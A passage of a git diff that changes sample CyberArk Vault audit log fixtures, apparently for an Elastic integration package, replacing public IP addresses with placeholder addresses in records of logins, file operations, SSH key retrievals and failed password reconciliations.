06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log index 283cc15f94e..6cfba6b84db 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log @@ -1,2 +1,2 @@ -<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} +<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:03:43\n 2021-03-11T18:03:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 4\n User Authentication\n Error\n Administrator\n User Authentication\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n User Authentication\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log index f3d9bd31a39..6b4bda22fbe 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.13\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n Administrator\n Store File\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Store File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log index d9d8af79da4..127e5680b04 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log @@ -1,9 +1,9 @@ <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} -<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} +<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.14\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:32:12\n 2021-03-11T19:32:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 127.0.0.1\n \n \n \n \n \n Delete File\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}} -<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.14-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.14-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.14"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:50\n 2021-03-11T21:06:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSM-ASR-CYBERARK-WI\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}} <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:10:17\n 2021-03-14T12:10:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSMAdmin\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}} <5>1 2021-03-15T15:09:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:09:00\n 2021-03-15T15:09:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n partner\n Root\\Database-Oracle-10.128.0.7-adrian\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log index 2a5483207bf..f526f3989a1 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log @@ -1,9 +1,9 @@ -<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First 